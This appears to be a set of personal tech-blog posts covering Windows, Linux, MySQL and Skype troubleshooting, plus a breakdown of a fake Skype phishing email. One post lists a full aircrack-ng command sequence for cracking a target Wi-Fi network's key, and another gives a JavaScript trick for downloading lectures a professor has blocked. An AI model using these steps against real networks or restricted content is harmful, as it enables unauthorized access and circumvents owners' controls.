If your professor disabled the ability to download the lectures, here’s the way to get around it. First, here’s the snippet you will need; then read below it for instructions.

javascript:__doPostBack('__Page','DownloadPresentation:1299fb37-f10a-31be-97fe-0224842e6cdd')

On the lectures list, hover over the link to the lecture you want and copy the peid from the URL. Put it after “DownloadPresentation” in the above JavaScript snippet, and add dashes exactly where that peid has them – you should have an extra “1d” on the end which you should just delete. Then run that javascript on the lecture list, and the download dialog will pop up.

Are you getting events in the event viewer every few seconds? Event IDs 50034 and 50068? The text of event 50034 is “An error has occurred in initializing the adapter 15. Error Code is 0×1392″ (perhaps a different adapter number), and event 50068 is “Address 192.168.1.100 being plumbed for adapter 15 already exists” (with a different address and/or adapter number). Here’s the solution:

First check if one of your adapters has a static IP address that you assigned it.

If not, then just disable one of the adapters. Suddenly the other one will be connected no problem. The reason is simply that one of the adapters was previously assigned address 192.168.1.100 (or whatever your error is saying), and even though that adapter is disconnected, it is still conflicting with your new adapter trying to become 192.168.1.100. The DHCP-client service won’t assign two adapters the same address, so it keeps renewing attempting to get a new IP, but the DHCP server (your router) keeps assigning it the same conflicting address.

It’s safe to leave the adapter disabled, but if you don’t like the idea of having one of your adapters disabled even when it’s unplugged, then re-enable it and plug it in to something which assigns the adapter (via DHCP) a new address. Then Windows will allow your other adapter to take the address it has been trying to get all along.

I saw this in my own laptop. It has an ethernet adapter (Local Area Connection) and wireless adapter. The ethernet was unplugged and I was trying to connect to my wireless network, but the wireless network kept connecting and disconnecting repeatedly. The solution was to disable my local area connection adapter. Then suddenly the wireless one was connected! The underlying problem was some static DHCP settings I had set in the past.

Also, if you’re reading this and it fixed your problem, you probably also enabled static DHCP like I did. If so, make sure to assign a different IP to each of your adapters even to the same computer; i.e. assign 192.168.1.100 to the ethernet adapter and 192.168.1.101 to the wireless adapter. Even if they will never both be connected at the same time, this and other problems can arise by them being set to the same DHCP address.

Hope this helped you. Feel free to add any other information in the comments below.

I’m trying to grasp a very slippery issue lately. Several users have OneNote 2007 installed and are sharing a notebook over the network (via a shared network drive). One of them will open OneNote and sometimes (randomly) a shortcut to a tab will be created in the shared notebook. This occurs without the user even viewing that specific notebook and sometimes multiple shortcuts are created at once. Looking at the owners of the shortcuts, not everyone is affected by this bug. They are all running Windows 7 64-bit with an almost identical environment.

I found a few instances of it across the web but it seems to be a very scarce bug:

2008-7-3

2010-5-7

The best idea is probably to bump them to OneNote 2010 (and hope it doesn’t happen) but we are not yet ready to migrate users, so in the meantime I’ll need to try and find a solution.

I need to run Office Diagnostics on each of the computers. It might fix the problem automatically, if the moon is aligned just right.

I will update this page once I find a solution. If you are also having this issue, please comment, especially if you have something to add.

Importing a CSV file which was saved from Excel 2007/2010 into MySQL using phpMyAdmin is easy once you know how! Just carefully follow all of these steps:

1. Sanitize the CSV file: Open the CSV file in a text editor (preferably something better than notepad.exe, such as Notepad++). If the first row contains column names, delete it. If there are extra last rows at the bottom of the file, delete them (leave one completely blank line at the end). Do a search for “,,” (two commas in a row) and wherever you find that, add a value between those commas; the value should match the type of that column, so if it’s a numeric column, add a number (0 or -1), and so on. Do a search-and-replace for “” (two quotation marks) and replace all by \” (backslash quotation mark). Save!

2. Open phpMyAdmin: In phpMyAdmin, click the table, and then click the Import tab at the top of the page.

3. Import: Browse and open the (sanitized) csv file. Leave the charset as-is. Uncheck partial import unless you have a HUGE dataset (or slow server). The format should already have selected “CSV” after selecting your file, if not then select it (not using LOAD DATA). If you want to clear the whole table before importing, check “Replace table data with file”. Optionally check “Ignore duplicate rows” if you think you have duplicates in the CSV file. Now the important part, set the next four fields to these values:

Fields terminated by: ,

Fields enclosed by: “

Fields escaped by: \

Lines terminated by: auto

Currently these match the defaults except for “Fields terminated by”, which defaults to a semicolon. The crucially important sanitization step prepared the CSV file to work with these values so make sure you did in fact follow my sanitize step above. Now for column names, put a comma separated list of your table’s column names which match the CSV columns. This is case sensitive, no spaces after the commas, no quotes around the table names. Like this: column1,other_column,column3.

Now click the Go button, and it should run successfully. I tested this method with values that contained combinations of single quotes, double quotes and commas, and the values all seemed to import correctly after following everything above. If you have problems with this method please email me via the button on my homepage, and if you found this to be helpful please consider commenting or reposting and linking back to here so that perhaps this can rise to the top of search results. Thanks!

All of the below commands should be run with sudo or in a root shell in Ubuntu Linux

service network-manager stop
killall wpa_supplicant

airmon-ng start wlan0
airodump-ng mon0

(find the target wireless network, ctrl-c)

airodump-ng -c [channel] -w [filename] --bssid [mac] mon0

open a new terminal

aireplay-ng -1 0 -a [mac] -e [network name] mon0

Should get the “Association successful ” message

aireplay-ng -3 -b [mac] mon0

Now lots of data should be generated and captured in the first terminal. Open a third terminal:

aircrack-ng -b [mac] [filename]-01.cap

Key should be found.

I just got a fake email from “Skype Support” and wanted to let everyone know about it. If you are viewing this page, I assume you got here by searching because you got the email too. Don’t visit the website.

I visited it in my sandboxed Linux machine and it redirected me to a fake imitation of the Skype software. But just going from the email, here are the clues to show it’s fake:

1. It comes from the email address “skype@mediaresearch.tv”. If it’s not @skype.com, and it’s claiming to be Skype, don’t trust it.

2. One of the “updates” says “Now available on PSP!” – I presume this refers to the PlayStation Portable. And I highly doubt Skype will be releasing a program for the PSP; that just doesn’t seem like a target platform for them.

3. The links all point to skype-upgrade.com. Why not skype.com? (hint: because it’s not actually from Skype)

4. The copyright line says “Copy rights Skype 2010″. Really? “Copy rights”? This just screams foreign translation.

5. I did a Google Maps search for “3029 Maranta Rd, NY, 10310″ with no results. I then looked up 10310, which is Staten Island, NY, and did another search for “3029 Maranta Rd, Staten Island, NY” and still no results. Either Google Maps doesn’t know about it, or it’s a fake address.

6. According to Wikipedia (since I couldn’t find their address from skype.com), Skype Limited (the company which makes Skype) is a Luxembourg-based company; headquarters in Luxembourg. This further invalidates the address.

7. The WHOIS lookup for “skype-upgrade.com” doesn’t even resemble the lookup for skype.com.

If this isn’t enough evidence for you, then hey, go download some spyware. I reported the email to Skype and they responded with instructions on how to opt-out of their newsletter… I replied back with these facts and am yet to hear a response, but I hope they wake up and actually pursue the scammer.

I doubt it though.

Update: It seems these emails are being sent to addresses registered at the CCleaner forums (see below comments from Roger and John), though I am not personally registered at these forums so our emails are likely being stolen from other places as well. I also got a similar Adobe Reader email this morning.

Complete contents of the email: (converted to text, links stripped)

I just wrestled with Arch Linux for several hours before figuring out a stupid mistake.

If the output of
glxinfo | grep -i rend
includes Software Rasterizer but already has direct rendering: Yes, then it’s very likely that you simply didn’t add your user to the video group. Do so by running
usermod -a -G video [username]
as root (or with sudo). After logging out and back in (or maybe a reboot), the output should now include Mesa and your video should be running fullspeed.

I also recommend undoing whatever changes you might have made from the ATI page and then going through them again, after you add yourself to the video group. For example I was messing with early and late KMS start but after adding myself to the video group I removed that; I basically undid all my changes, leaving only my custom xorg.conf file, and the video group was indeed the cause of all of my issues.

However, you may want/need to install radeon_ucode and maybe radeon-initrd still despite the video group. Do a search for installing packages from AUR, and follow the simple steps to get those installed in your system, and they will take effect on the next reboot. After radeon_ucode is successfully installed,
dmesg | grep firmware
should say something like “platform radeon_cp.0: firmware: requesting radeon/R300_cp.bin”; and the last line of
dmesg | grep radeon
should tell you that it initialized radeon. In any case, I installed those packages and left them in after discovering the video group, and my card is working great. So I don’t think they hurt anything.

Ugh. I can see the use in this feature for a multi-user system, but at the same time, it’s a little annoying that the Beginners’ Guide wasn’t very clear about it and the ATI page had nothing about it. I guess the moral of this story is, debug things as root first; the root user would’ve run video at full speed and then I may have narrowed it down from there.

Also a little sidenote: don’t use glxgears as a benchmark; the FPS can vary widely depending on the size of the window. For a moment I thought xmonad was slowing down my graphics compared to xterm, but instead I was just getting lower glxgears FPS in xmonad because it rendered on the entire left half of the screen, whereas xterm opened glxgears in a tiny window up in the corner of the screen. False alarm!

Whew, I just had quite a difficult time getting Artifactory to install and run in CentOS. They have a nice installation guide, and it almost worked but not quite.

I am using the JPackage repository, so my java installation probably came out of there. And it seems to be slightly nonstandard, so I had to find the correct paths to make Artifactory happy.

Oh and also, I’m using the standalone Artifactory. I think it’s high time for me to learn an application server but for now, this is the last piece of my setup so I’ll let it be. Those of you that have the slightest clue about application servers might want to stop right here and just drop the Artifactory war file in your server.

Anyway, I’ll get to the point. Here’s what to do:

Unzip artifactory somewhere. I unzipped it inside /usr/local; so, my ARTIFACTORY_HOME = “/usr/local/artifactory”.

su and cd to that directory, then run ./bin/install.sh

cd etc (or /etc/artifactory, but not /etc; install.sh creates a symlink in $ARTIFACTORY_HOME/etc that points to /etc/artifactory)

Now edit the file ‘default’ with your favorite editor (vim default).

Uncomment or add the two lines:

export JAVA_HOME=/usr

export JAVA=/bin/java

Save and close this file. Now /sbin/service artifactory start – and you should be good to go!

Optionally, before starting (or do a restart afterwards), edit jetty.xml inside the etc directory and customize the port that Jetty runs on, on line 52.

Feel free to comment below if you found this useful or if you have anything else to add!

uncheck Keep Skype in the taskbar while I’m signed in.

click OK

Thanks to “Good Samaritan” for pointing this out in the comments, after I previously posted a flawed solution.

I’m running Wubi with Ubuntu 9.10; I upgraded my kernel (from 14 to 19) and after a restart, landed at the GRUB prompt, “sh:grub>”. Yikes! I wasn’t actually familiar with the GRUB prompt before now. After some Google searching, here’s what I found: (keep reading, this is not the final solution, don’t bother following this link unless you’re just curious)

sh:grub Fix Wubi after grub-pc update on Karmic Koala

I followed those steps. He is very complete in his instructions. However, when I hit the “boot” command after loading up the 19 kernel, my computer just rebooted. I tried it again with my version 14 kernel and it booted into Ubuntu just fine. Okay, so I figured I’d just uninstall kernel 19 and go back to 14. Well, when I tried to do that in Synaptic, the generic meta packages depend on 19 so they would have been removed as well. I don’t know if this is a bad thing, but it scared me into more searching, where I found the real solution:

Boot Problems:Wubi 9.10

It’s quite simple; just do as the Solution section on the page says. I was careful to back up my existing wubildr file, but after rebooting, my boot menu was back! I chose kernel 19, and it booted correctly. Yay!

Oddly enough, if you do a Google search for “boot problems:wubi 9.10″ or even include site:sourceforge.net, you will not find that page above. Edit: it is now in Google, though what search terms bring it to the top of the results I can’t be sure.

Edit 3-5-2010:

I just upgraded from 2.6.31-19 to 2.6.31-20 without problem. I did not have to recopy the wubildr file or anything; it just booted correctly. So it looks like this is a permanent fix!
